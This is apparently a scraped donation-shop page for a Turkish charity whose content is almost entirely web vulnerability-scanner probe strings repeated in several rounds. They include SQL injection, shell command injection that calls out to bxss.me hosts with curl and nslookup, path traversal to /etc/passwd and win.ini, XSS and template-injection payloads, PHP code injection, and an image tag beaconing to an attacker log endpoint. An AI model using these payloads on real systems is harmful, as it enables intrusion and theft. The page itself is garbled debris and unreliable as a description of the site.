Çağrı Vakfı Online Bağış - Hoşgeldiniz
Alışveriş sepetinizde ürün yok.
Lorem ipsum faucibus lacinia integer duis integer sodales accumsan, platea cubilia luctus sodales primis fusce ultricies, luctus feugiat tristique class urna consequat nostra duis erat malesuada semper tempor enim laoreet.
1zVmQN24IO
O07R6a6E
1*
response.write(9897079*9151892)
echo wctrrr$()\ qsugym\nz^xyu||a #' &echo wctrrr$()\ qsugym\nz^xyu||a #|" &echo wctrrr$()\ qsugym\nz^xyu||a #
'+response.write(9897079*9151892)+'
UF7NYdC1
1*
&echo qbajne$()\ czprpk\nz^xyu||a #' &echo qbajne$()\ czprpk\nz^xyu||a #|" &echo qbajne$()\ czprpk\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
1*
"+response.write(9897079*9151892)+"
|echo nypiyv$()\ vzpiby\nz^xyu||a #' |echo nypiyv$()\ vzpiby\nz^xyu||a #|" |echo nypiyv$()\ vzpiby\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
1*
(nslookup -q=cname hitswmthzzipq6eb3c.bxss.me||curl hitswmthzzipq6eb3c.bxss.me))
file:///etc/passwd
-1 OR 2+146-146-1=0+0+0+1
$(nslookup -q=cname hitzgaysttvfn9bd1e.bxss.me||curl hitzgaysttvfn9bd1e.bxss.me)
-1 OR 3+146-146-1=0+0+0+1
&nslookup -q=cname hitkvpkgccokpaedff.bxss.me&'\"`0&nslookup -q=cname hitkvpkgccokpaedff.bxss.me&`'
../
&(nslookup -q=cname hitnxvzmzlemr56cd4.bxss.me||curl hitnxvzmzlemr56cd4.bxss.me)&'\"`0&(nslookup -q=cname hitnxvzmzlemr56cd4.bxss.me||curl hitnxvzmzlemr56cd4.bxss.me)&`'
bcc:074625.247-33853.247.007da.19745.2@bxss.me
./
|(nslookup -q=cname hitfnxheneafm51183.bxss.me||curl hitfnxheneafm51183.bxss.me)
if(now()=sysdate(),sleep(15),0)
to@example.com>
bcc:074625.247-33854.247.007da.19745.2@bxss.me
`(nslookup -q=cname hitycdypiztha4b26f.bxss.me||curl hitycdypiztha4b26f.bxss.me)`
;(nslookup -q=cname hitzcfjgjyklr9cfd7.bxss.me||curl hitzcfjgjyklr9cfd7.bxss.me)|(nslookup -q=cname hitzcfjgjyklr9cfd7.bxss.me||curl hitzcfjgjyklr9cfd7.bxss.me)&(nslookup -q=cname hitzcfjgjyklr9cfd7.bxss.me||curl hitzcfjgjyklr9cfd7.bxss.me)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
<esi:include src="http://bxss.me/rpb.png"/>
1 waitfor delay '0:0:15' --
${9999560+9999351}
FaURNlQA'; waitfor delay '0:0:15' --
-5 OR 920=(SELECT 920 FROM PG_SLEEP(15))--
-5) OR 547=(SELECT 547 FROM PG_SLEEP(15))--
-1)) OR 11=(SELECT 11 FROM PG_SLEEP(15))--
OYrnW2V8' OR 723=(SELECT 723 FROM PG_SLEEP(15))--
&n971341=v947644
)
!(()&&!|*|*|
^(#$!@#$)(()))******
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
'.gethostbyname(lc('hitjq'.'wikujgnx46b9d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(100).chr(74).'
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
".gethostbyname(lc("hitia"."meqlrzob29d68.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(68).chr(108).chr(79)."
/etc/shells
'"()
c:/windows/win.ini
KaGfxtJ7') OR 760=(SELECT 760 FROM PG_SLEEP(15))--
bxss.me
'&&sleep(27*1000)*zcypdd&&'
"&&sleep(27*1000)*gtetfn&&"
'||sleep(27*1000)*ydqmvj||'
Zvb7fgX1')) OR 858=(SELECT 858 FROM PG_SLEEP(15))--
"||sleep(27*1000)*nflzdf||"
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
";print(md5(31337));$a="
1'"
${@print(md5(31337))}
${@print(md5(31337))}\
@@8BKIq
'.print(md5(31337)).'
ctime
sleep
p0
(I30
tp1
Rp2
.
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(103).concat(90).concat(115).concat(90)+(require"socket"
Socket.gethostbyname("hitfd"+"audweaeg12cfc.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(109).concat(87).concat(104).concat(89)+(require'socket'
Socket.gethostbyname('hitdo'+'vfvekbrh54640.bxss.me.')[3].to_s)+'
find-out-about-our-products
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
find-out-about-our-products/.
xfs.bxss.me
'"
<!--
'"()&%<zzz><ScRiPt >hIch(9355)</ScRiPt>
'"()&%<zzz><ScRiPt >hIch(9377)</ScRiPt>
9599534
bfg10813<s1﹥s2ʺs3ʹhjl10813
bfgx5928%C0%BEz1%C0%BCz2a%90bcxhjl5928
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >hIch(9099)</ScRiPt>
<WMB9AD>G5SGD[!+!]</WMB9AD>
<script>hIch(9629)</script>
<ScR<ScRiPt>IpT>hIch(9316)</sCr<ScRiPt>IpT>
<ScRiPt
>hIch(9734)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9620></ScRiPt>
<isindex type=image src=1 onerror=hIch(9564)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9608'>


<body onload=hIch(9352)>
<img src=//xss.bxss.me/t/dot.gif onload=hIch(9098)>
<img src=xyz OnErRor=hIch(9560)>
<img/src=">" onerror=alert(9266)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%68%49%63%68%289275%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\hIch(9067)\u003C/sCripT\u003E
<ScRiPt>hIch(9940)</sCripT>
%F6<img zzz onmouseover=hIch(94641) //%F6>
<input autofocus onfocus=hIch(9507)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(hIch(9053))}
D2lWQ
<ScRiPt >hIch(9436)</ScRiPt>
<WA5K2X>DRGWO[!+!]</WA5K2X>
<ifRAme sRc=9670.com></IfRamE>
<aqMT2bx x=9474>
<img sRc='http://attacker-9073/log.php?
<aLBJj2m<




-1 OR 2+566-566-1=0+0+0+1 --
-1 OR 2+103-103-1=0+0+0+1
-1' OR 2+325-325-1=0+0+0+1 --
-1' OR 2+827-827-1=0+0+0+1 or 'o1eF1scx'='
-1" OR 2+526-526-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
'"()&%<zzz><ScRiPt >Q4TL(9986)</ScRiPt>
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
response.write(9671165*9546111)
echo jyqpsv$()\ zqbeyf\nz^xyu||a #' &echo jyqpsv$()\ zqbeyf\nz^xyu||a #|" &echo jyqpsv$()\ zqbeyf\nz^xyu||a #
&echo ofcjfn$()\ hcovwt\nz^xyu||a #' &echo ofcjfn$()\ hcovwt\nz^xyu||a #|" &echo ofcjfn$()\ hcovwt\nz^xyu||a #
'+response.write(9671165*9546111)+'


"+response.write(9671165*9546111)+"
|echo yssbzq$()\ ogigjk\nz^xyu||a #' |echo yssbzq$()\ ogigjk\nz^xyu||a #|" |echo yssbzq$()\ ogigjk\nz^xyu||a #
'"()&%<zzz><ScRiPt >Q4TL(9895)</ScRiPt>
(nslookup -q=cname hitohbluqcuyoc472b.bxss.me||curl hitohbluqcuyoc472b.bxss.me))


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


$(nslookup -q=cname hitlgxhafrwzu3c7ea.bxss.me||curl hitlgxhafrwzu3c7ea.bxss.me)


&nslookup -q=cname hitopuwcctpbj8f9fc.bxss.me&'\"`0&nslookup -q=cname hitopuwcctpbj8f9fc.bxss.me&`'


(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
&(nslookup -q=cname hitdcaggcdxkc2de57.bxss.me||curl hitdcaggcdxkc2de57.bxss.me)&'\"`0&(nslookup -q=cname hitdcaggcdxkc2de57.bxss.me||curl hitdcaggcdxkc2de57.bxss.me)&`'
9076172
|(nslookup -q=cname hitudbcsyafmce95ff.bxss.me||curl hitudbcsyafmce95ff.bxss.me)
`(nslookup -q=cname hitpbyqyzxdvmcbc41.bxss.me||curl hitpbyqyzxdvmcbc41.bxss.me)`
1 waitfor delay '0:0:15' --
;(nslookup -q=cname hitdmodojyxus31ff9.bxss.me||curl hitdmodojyxus31ff9.bxss.me)|(nslookup -q=cname hitdmodojyxus31ff9.bxss.me||curl hitdmodojyxus31ff9.bxss.me)&(nslookup -q=cname hitdmodojyxus31ff9.bxss.me||curl hitdmodojyxus31ff9.bxss.me)


oQNwPFcD


../../../../../../../../../../../../../../etc/passwd


../../../../../../../../../../../../../../windows/win.ini
2bKE9zVy'; waitfor delay '0:0:15' --
file:///etc/passwd


../


IDXWh7ig' OR 876=(SELECT 876 FROM PG_SLEEP(15))--


to@example.com>
bcc:074625.247-34804.247.007da.19745.2@bxss.me

















<esi:include src="http://bxss.me/rpb.png"/>




ik86AdjL') OR 838=(SELECT 838 FROM PG_SLEEP(15))--










${9999381+9999602}






LtGGLznV')) OR 805=(SELECT 805 FROM PG_SLEEP(15))--


http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

&n959236=v908489
)
1'"
Http://bxss.me/t/fit.txt
!(()&&!|*|*|
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******
/etc/shells
@@b7yL7




c:/windows/win.ini
bxss.me




































'.gethostbyname(lc('hitax'.'nvimqyvn20668.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(86).chr(106).chr(80).'
".gethostbyname(lc("hitau"."jaucnxshefa2e.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(70).chr(107).chr(80)."
'"()



'&&sleep(27*1000)*dmoizl&&'





"&&sleep(27*1000)*cocdsj&&"

'||sleep(27*1000)*rcmcdf||'

"||sleep(27*1000)*wjhuio||"




;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}


ctime
sleep
p0
(I30
tp1
Rp2
.
${@print(md5(31337))}\
HttP://bxss.me/t/xss.html?%00
'.print(md5(31337)).'
bxss.me/t/xss.html?%00


















"+"A".concat(70-3).concat(22*4).concat(121).concat(81).concat(109).concat(76)+(require"socket"
Socket.gethostbyname("hitbp"+"hnsajmvt5a5e9.bxss.me.")[3].to_s)+"




'+'A'.concat(70-3).concat(22*4).concat(115).concat(70).concat(120).concat(71)+(require'socket'
Socket.gethostbyname('hitko'+'phyxetaoc54d5.bxss.me.')[3].to_s)+'














find-out-about-our-products
find-out-about-our-products/.






)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))




xfs.bxss.me




'"
<!--







'"()&%<zzz><ScRiPt >JmWN(9657)</ScRiPt>








'"()&%<zzz><ScRiPt >JmWN(9879)</ScRiPt>

9446734


bfg1859<s1﹥s2ʺs3ʹhjl1859






bfgx6699%C0%BEz1%C0%BCz2a%90bcxhjl6699
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca




dfb__${98991*97996}__::.x




"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<ScRiPt >JmWN(9422)</ScRiPt>

<WE7VHY>XX7IN[!+!]</WE7VHY>





<ScRiPt
>JmWN(9896)</ScRiPt>

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9212></ScRiPt>

<isindex type=image src=1 onerror=JmWN(9695)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9096'>

<body onload=JmWN(9385)>

<img src=//xss.bxss.me/t/dot.gif onload=JmWN(9886)>

<img src=xyz OnErRor=JmWN(9047)>

<img/src=">" onerror=alert(9578)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%4A%6D%57%4E%289770%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>JmWN(9480)</sCripT>
%F6<img zzz onmouseover=JmWN(92151) //%F6>

<input autofocus onfocus=JmWN(9370)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>

}body{zzz:Expre/**/SSion(JmWN(9279))}

XlhG9
<ScRiPt >JmWN(9619)</ScRiPt>

<WSWPEE>WGWKK[!+!]</WSWPEE>

<ifRAme sRc=9817.com></IfRamE>

<auBOpNH x=9310>

<img sRc='http://attacker-9121/log.php?

<aWh9OVr<


















































































'"()&%<zzz><ScRiPt >p0Ti(9178)</ScRiPt>
response.write(9712337*9618155)
echo bmvcpz$()\ rnpahl\nz^xyu||a #' &echo bmvcpz$()\ rnpahl\nz^xyu||a #|" &echo bmvcpz$()\ rnpahl\nz^xyu||a #
'+response.write(9712337*9618155)+'
&echo ahphgb$()\ gevekx\nz^xyu||a #' &echo ahphgb$()\ gevekx\nz^xyu||a #|" &echo ahphgb$()\ gevekx\nz^xyu||a #
"+response.write(9712337*9618155)+"
BYWpliyJ
|echo hleolo$()\ mvbkfl\nz^xyu||a #' |echo hleolo$()\ mvbkfl\nz^xyu||a #|" |echo hleolo$()\ mvbkfl\nz^xyu||a #
(nslookup -q=cname hithjukivpkwi3d381.bxss.me||curl hithjukivpkwi3d381.bxss.me))
$(nslookup -q=cname hitmaxenvqcxp6b139.bxss.me||curl hitmaxenvqcxp6b139.bxss.me)
&nslookup -q=cname hitbdiqavmteldce99.bxss.me&'\"`0&nslookup -q=cname hitbdiqavmteldce99.bxss.me&`'
&(nslookup -q=cname hitdwjcnqoivbbb420.bxss.me||curl hitdwjcnqoivbbb420.bxss.me)&'\"`0&(nslookup -q=cname hitdwjcnqoivbbb420.bxss.me||curl hitdwjcnqoivbbb420.bxss.me)&`'
'"()&%<zzz><ScRiPt >p0Ti(9175)</ScRiPt>
|(nslookup -q=cname hitymhguxmzbaed31a.bxss.me||curl hitymhguxmzbaed31a.bxss.me)
-1 OR 2+674-674-1=0+0+0+1 --
`(nslookup -q=cname hitkqvrvyniqmefc76.bxss.me||curl hitkqvrvyniqmefc76.bxss.me)`
-1 OR 3+674-674-1=0+0+0+1 --
;(nslookup -q=cname hitbbxkmpltbu903a3.bxss.me||curl hitbbxkmpltbu903a3.bxss.me)|(nslookup -q=cname hitbbxkmpltbu903a3.bxss.me||curl hitbbxkmpltbu903a3.bxss.me)&(nslookup -q=cname hitbbxkmpltbu903a3.bxss.me||curl hitbbxkmpltbu903a3.bxss.me)
-1 OR 2+506-506-1=0+0+0+1
-1 OR 3+506-506-1=0+0+0+1
-1' OR 2+735-735-1=0+0+0+1 --
../../../../../../../../../../../../../../etc/passwd
-1' OR 3+735-735-1=0+0+0+1 --
../../../../../../../../../../../../../../windows/win.ini
-1' OR 2+997-997-1=0+0+0+1 or 'OcDTcnN2'='
file:///etc/passwd
-1' OR 3+997-997-1=0+0+0+1 or 'OcDTcnN2'='
bcc:074625.247-35674.247.007da.19745.2@bxss.me
to@example.com>
bcc:074625.247-35675.247.007da.19745.2@bxss.me
-1" OR 2+57-57-1=0+0+0+1 --
9159490
-1" OR 3+57-57-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-1; waitfor delay '0:0:15' --
<esi:include src="http://bxss.me/rpb.png"/>
-1); waitfor delay '0:0:15' --
bfg10371<s1﹥s2ʺs3ʹhjl10371
1 waitfor delay '0:0:15' --
${10000187+9999821}
jA8cWnDJ'; waitfor delay '0:0:15' --
-5 OR 292=(SELECT 292 FROM PG_SLEEP(15))--
-5) OR 376=(SELECT 376 FROM PG_SLEEP(15))--
-1)) OR 970=(SELECT 970 FROM PG_SLEEP(15))--
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
&n957266=v964551
KiWXAX8E' OR 271=(SELECT 271 FROM PG_SLEEP(15))--
Http://bxss.me/t/fit.txt
bfgx7423%C0%BEz1%C0%BCz2a%90bcxhjl7423
http://bxss.me/t/fit.txt?.jpg
../../../../../../../../../../../../../../../proc/version
/etc/shells
fRgCfKhE') OR 693=(SELECT 693 FROM PG_SLEEP(15))--
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
c:/windows/win.ini
ARBcXix9')) OR 701=(SELECT 701 FROM PG_SLEEP(15))--
bxss.me
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
@@haRm7
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
)
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
!(()&&!|*|*|
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
^(#$!@#$)(()))******
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
/WEB-INF/web.xml
<%={{={@{#{${dfb}}%>
'.gethostbyname(lc('hithz'.'ajqydjvab7060.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(79).chr(117).chr(72).'
".gethostbyname(lc("hitrf"."fthowgut4865d.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(88).chr(122).chr(81)."
C:\WINDOWS\system32\drivers\etc\hosts
'"()
/../../../../../../../../../../boot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
'&&sleep(27*1000)*yakyoz&&'
"&&sleep(27*1000)*wbuhsw&&"
..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\windows\win.ini
'||sleep(27*1000)*tzxkdr||'
"||sleep(27*1000)*lywqjf||"
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.